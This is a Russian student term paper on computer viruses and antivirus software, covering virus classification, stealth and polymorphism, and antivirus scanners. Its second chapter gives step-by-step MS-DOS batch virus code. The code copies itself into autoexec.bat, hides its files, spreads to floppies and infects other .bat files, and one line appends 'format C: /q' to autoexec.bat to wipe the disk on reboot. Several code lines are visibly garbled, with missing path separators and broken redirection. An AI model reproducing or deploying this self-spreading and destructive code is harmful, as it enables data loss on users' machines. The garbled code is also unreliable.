Автор: Пользователь скрыл имя, 22 Марта 2012 в 11:48, курсовая работа
В наши дни трудно найти человека, знакомого с персональным компьютером и ни разу не столкнувшегося с компьютерными вирусами. Они преследуют его повсюду: в интернете, на различных носителях информации (флешки, CD,DVD диски), в локальной сети. В моем курсовом проекте я решил познакомить читателя с компьютерными вирусами, привести пример написания вируса без использования каких-либо специальных программ, рассказать об антивирусных программах и помочь ему выбрать наиболее подходящий антивирус из наиболее популярных на данный момент программ такого рода(Dr.Web, Kaspersky Internet Security, AVZ, Nod32).
МИНИСТЕРСТВО ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ
Московский Государственный институт электроники и математики
(Технический университет)
Кафедра информационно - коммуникационных технологий
КУРСОВАЯ РАБОТА НА ТЕМУ:
«Современные вирусы и борьба с ними»
ПО ДИСЦИПЛИНЕ "ОРГАНИЗАЦИЯ ЭВМ "
ВЫПОЛНИЛ:
СТУДЕНТ ГРУППЫ С-34
Таранов Игорь Юрьевич
ПРЕПОДАВАТЕЛЬ: доцент
Мартиросян Сашик Торгомович
Москва, 2010г.
Введение.
В наши дни трудно найти человека, знакомого с персональным компьютером и ни разу не столкнувшегося с компьютерными вирусами. Они преследуют его повсюду: в интернете, на различных носителях информации (флешки, CD,DVD диски), в локальной сети. В моем курсовом проекте я решил познакомить читателя с компьютерными вирусами, привести пример написания вируса без использования каких-либо специальных программ, рассказать об антивирусных программах и помочь ему выбрать наиболее подходящий антивирус из наиболее популярных на данный момент программ такого рода(Dr.Web, Kaspersky Internet Security, AVZ, Nod32).
Постановка задачи.
1)Привести общие факты о вирусах (история возникновения, формулировка определения, какие программы считаются вирусами, типы современных вирусов, факты о наиболее "нашумевших" вирусах).
2)Привести пример простейших вирусов, которые можно сделать "на колене" без каких-либо специальных программ и утилит (простейшие вирусы можно сделать даже в блокноте).
3)Дать характеристику современных антивирусных программ: познакомить читателя с разновидностями современных антивирусов, раскрыть принцип работы этих программ.
4)Знакомство с наиболее популярными современными антивирусами: Nod32, Dr.Web, Kaspersky Internet Security, AVZ.
5)Проверка нескольких современных антивирусных программ на эффективность поиска зараженных файлов, сравнение их работы и выявление таким образом наиболее "привлекательного" антивируса.
Часть 1.
Знакомство с вирусами.
Начну я свою курсовую работу, посвященную компьютерным вирусам, с того, что дам определение того, что же называется компьютерным вирусом. Существует множество определений этих программ. Например, на www.microsoft.com дано следующее определение: «Компьютерные вирусы — это небольшие программы, которые распространяются с компьютера на компьютер и вмешиваются в работу операционной системы». Попытки дать определение этим программам заводят исследователей компьютерных вирусов вплоть до того, что они (исследователи) приходят к выводу, что дать формальное определение компьютерного вируса невозможно по той причине, что на данный момент эти программы слишком многообразны, и в результате определение получится либо слишком общим, либо просто начнется перечисление известных компьютерных вирусов. Поэтому в данный момент наиболее целесообразным я нахожу как раз перечислить свойства современных компьютерных вирусов. Прежде всего, вирус – это программа. Достаточно очевидное свойство, которое, развеивает множество легенд о компьютерных вирусах. Вирус может перевернуть изображение на вашем мониторе, но не может перевернуть сам монитор. К легендам о вирусах-убийцах, «уничтожающих операторов посредством вывода на экран смертельной цветовой гаммы 25-м кадром» также не стоит относиться серьезно. К сожалению, некоторые авторитетные издания время от времени публикуют «самые свежие новости с компьютерных фронтов», которые при ближайшем рассмотрении оказываются следствием не вполне ясного понимания предмета. Вирус - программа, обладающая способностью к самовоспроизведению. Эта особенность присуща всем типам вирусов. Вирус не может существовать в «полной изоляции»: все вирусы так или иначе взаимодействуют с программным обеспечением компьютера и в какой-то меру корректируют нормальную работу компьютера.
Теперь поговорим о классификации вирусов. Итак, классифицировать вирусы я нашел наиболее наглядным и удобным виде таблицы с последующим более детальным рассмотрением ее частей (информация получена с www.hackzone.ru ,их классификацию вирусов я счел наиболее прижившейся в рунете и потому решил в своей работе привести еменно её) :
Файловые вирусы либо различными способами внедряются в выполняемые файлы (наиболее распространенный тип вирусов), либо создают файлы-двойники (компаньон-вирусы), либо используют особенности организации файловой системы (link-вирусы).
Загрузочные вирусы записывают себя либо в загрузочный сектор диска (boot-сектор), либо в сектор, содержащий системный загрузчик винчестера (Master Boot Record), либо меняют указатель на активный boot-сектор.
Макро-вирусы заражают файлы-документы и электронные таблицы нескольких популярных редакторов.
Сетевые вирусы используют для своего распространения протоколы или команды компьютерных сетей и электронной почты.
Среди особенностей алгоритма выделяют следующие пункты:
-Резидентность. Резидентный вирус при инфицировании компьютера оставляет в оперативной памяти свою резидентную часть, которая затем перехватывает обращения операционной системы к объектам заражения и внедряется в них. Резидентные вирусы находятся в памяти и являются активными вплоть до выключения компьютера или перезагрузки операционной системы. Нерезидентные вирусы не заражают память компьютера и сохраняют активность ограниченное время. Некоторые вирусы оставляют в оперативной памяти небольшие резидентные программы, которые не распространяют вирус. Такие вирусы считаются нерезидентными. Также резидентными можно считать макро вирусы так как они присутствуют в памяти компьютера в течение всего времени работы вашего редактора.
- Использование стелс алгоритмов- позволяет вирусам незаметно присутствовать в памяти компьютера. Наиболее общим в их работе является то, что они заражают файл, а при обращении ОС к этому файлу временно его лечат, подставляя вместо себя фрагменты незараженной информации, тем самым уменьшая риск собственного обнаружения и ликвидации. Наиболее прославившимися вирусами такого типа были вирус «Frodo» и первый известный загрузочный стелс вирус «Brain».
- Самошифрование и полиморфичность – присущи большинству современных вирусов. Благодаря этим свойствам вирусы затрудняют процесс детектирования. Такие вирусы не имеют постоянных участков кода и два образца одного и того же polymorphic вируса не будут содержать ни одного совпадения. Это достигается шифрованием основного тела вируса и модификациями программы-расшифровщика.
Часть 2.
Написание простейших вирусов.
Начать вторую часть моего курсового проэкта хотелось бы прежде всего с упоминания о статье 273: «Создание, использование и распространение вредоносных программ для ЭВМ» и далее осветить пункты этой статьи (раз уж курсовой проэкт посвящен вирусам, то, думаю, данная информация будет далеко не лишней). Итак, перейдем, собственно, к пунктам
1.Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
2.Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.
Как думаю, читатель моего курсового проекта уже понял, наказания весьма серьезные, но, как известно, на данный момент интернет, скорее всего по причине практически полного отсутствия контроля большинства ресурсов на подобные казусы карательными органами, а, может, просто по причине банальной выгоды слишком большому количеству людей от подобного рода программ, все еще кишит самыми разнообразными вирусами.
Теперь, познакомившись, с тем, что, собственно, грозит разработчикам вирусных программ, самое время, перейти к написанию собственных простейших вирусов, которые, несомненно, не будут опасными, по той причине, что сейчас все антивирусные программы (о них мы поговорим в следующих главах) обладают технологией распознавания неизвестных вирусов. Как я обещал в начале, никаких специальных хакерских программ и утилит нам для этого не понадобится- мы воспользуемся стандартным блокнотом. По мере написания я буду комментировать, что, собственно мы пишем. Итак, собственно, для начала, перейдем к тому, что вирусом пока что назвать нельзя, зато с легкостью можно назвать основой любого вируса.
@Echo off – Запрещаем вывод на экран исполняемых команд.
copy %0 c:virus.bat >nul - копируем файл; запрещаем вывод на экран самой команды и результата её действия
echo c:virus.bat>>c:autoexec.bat - добавляем текст в уже существующий файл
Вот и готово. Выше вы увидели основу для одного из простейших bat-вирусов. Дальше мы дадим нашему вирусу новую способность – умение заражать другие компьютеры через дискету.
@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul - копируем этот файл на дискету, если таковая имеется в дисководе (копирование произойдет при перезагрузке компьютера)
@Echo off copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul -устанавливаем файлу virus.bat атрибут «скрытый»- echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul .
@Echo off if exist c:virus.bat goto ski -проверяем, существует ли файл-. copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :ski – если он существует, то программа переходит на метку ski. copy %0 a:run.bat >nul.
Таким образом, мы добавили еще одну интересную команду – if exist, благодаря которой вирус будет сам проверять, есть ли в наличии файл c:virus.bat и если он есть, то, не выполняя лишних действий, он (вирус) просто скопирует себя на дискету. Теперь же перейдем к финальной модернизации нашего вируса.
@echo off%[Meteor]% - выводим на экран текст Meteor.
if '%1=='In_ goto Meteo - если переменная %1 равна In, то переходим к метке «:Meteo»
if exist c:Meteor.bat goto Mete - проверяем, существует ли файл Meteor.bat, если да, то переходим к метке «:Mete»
if not exist %0 goto Met - если файл не существует, то переходим к метке «Met»
find "Meteor"c:Meteor.bat - проверяем, есть ли файл meteor на диске, если нет, то копируем его туда
attrib +h c:Meteor.bat - делаем файл скрытым.
:Mete – метка
for %%t in (*.bat) do call c:Meteor In_ %%t - выполняем одну команду (call - позволяет вызвать один пакетный файл из другого) для нескольких параметров- т.е. вирус находит файл с расширением .bat, и заражает его с помощью команды type, дописывая себя к найденному .bat-файлу.
goto Met – перейти к метке.
:Meteo – метка.
find "Meteor"nul - указываем файлу значение 2 и запрещаем вывод команды и ее результата на экран.
if not errorlevel 1 goto Met - если не произошло ошибки (с кодом 1) выполнения предыдущей команды, то переходим на метку.
type c:Meteor.bat>>%2 -дописываем «себя» к найденному .bat-файлу.
:Met – метка.
Готово. Для того, чтобы вышенаписанное стало вирусом, сохраняем его с разрешением .bat. Получаем пакетный файл MS-DOS. Для удобства восприятия далее выложу текст вируса без комментариев.
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul
@Echo off copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul
@Echo off if exist c:virus.bat goto ski
copy %0 c:virus.bat
>nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :ski
. copy %0 a:run.bat >nul
@echo off%[Meteor]%
if '%1=='In_ goto Meteo
if exist c:Meteor.bat goto Mete
if not exist %0 goto Met
attrib +h c:Meteor.bat
:Mete
for %%t in (*.bat) do call c:Meteor In_ %%t
goto Met
:Meteo
find "Meteor"nul
if not errorlevel 1 goto Met
type c:Meteor.bat>>%2
:Met
Ну и в заключение второй главы приведу еще 1 короткий, но весьма интересный пример.
@Echo off Echo format C: /q >> c:Autoexec.bat
Этот вирус добавляет autoexec.bat строку format C:\q и при перезагрузке компьютера происходит быстрое форматирование.
Итак, познакомившись во второй главе нашего курсового проекта с написанием простейших вирусов и тем самым несколько рассеяв плотную «завесу магии», наблюдаемую для подавляющего большинства современных пользователей ЭВМ вокруг программ такого рода, думаю, самое время перейти главе 3 и антивирусным программам.
Глава 3.
Знакомство с антивирусами.
Начну я третью главу моего курсового проекта с определения антивируса. Есть несколько определений для этих программ, начиная от самого лаконичного: «Антивирус — программное средство, предназначенное для борьбы с вирусами ,» - и заканчивая более емким и развернутым (предствалено на Wikipedia.org): «Антивирус – это программа для обнаружения компьютерных вирусов а также нежелательных программ и вообще восстановления зараженных такими программами файлов а также для профилактики – предотвращения заражения файлов и ОС вредоносным кодом.» Далее представлены (как и в случае с вирусами) типы антивирусов в виде наглядной схемы.
Антивирусы типа сканер появились самыми первыми – практически в одно и тоже время с появлением первых вирусов. Принцип их работы заключается в поиске вирусных масок в файлах, памяти и загрузочных секторах диска. Вирусные маски (описания) известных вирусов содержатся в антивирусной базе данных и если сканер встречает код, совпадающий с одним из этих описаний, он выдает сообщение об обнаружении вируса.
Недостатки сканера:
1) Малейшие модификации вируса могут сделать его невидимым для сканера: программный код не будет полностью совпадать с описанием в базе данных что влечет за собой проблемы с обнаружением полиморфных вирусов.
2) Время между появлением вируса и выходом соответствующего обновления пользователь остается практически незащищенным от атак новых вирусов. К счастью, сейчас вирусные базы обновляются очень часто, но, надо отметить, вирусы тоже не стоят на месте.
3) Антивирусный сканер проверяет файлы, только когда пользователь “попросит” его это сделать, т.е. запустит программу, что влечет за собой не только неудобства для пользователя, требуя от него постоянного внимания и концентрации, в результате чего ( в случае невнимательного и несконцентрированного пользователя) заражение обнаруживается постфактум либо не обнаруживается вовсе если пользователь забыл сделать проверку.
4) Большой размер вследствие необходимости таскать за собой антивируную базу данных, требовательность к системным ресурсам и небольшая скорость поиска вирусов.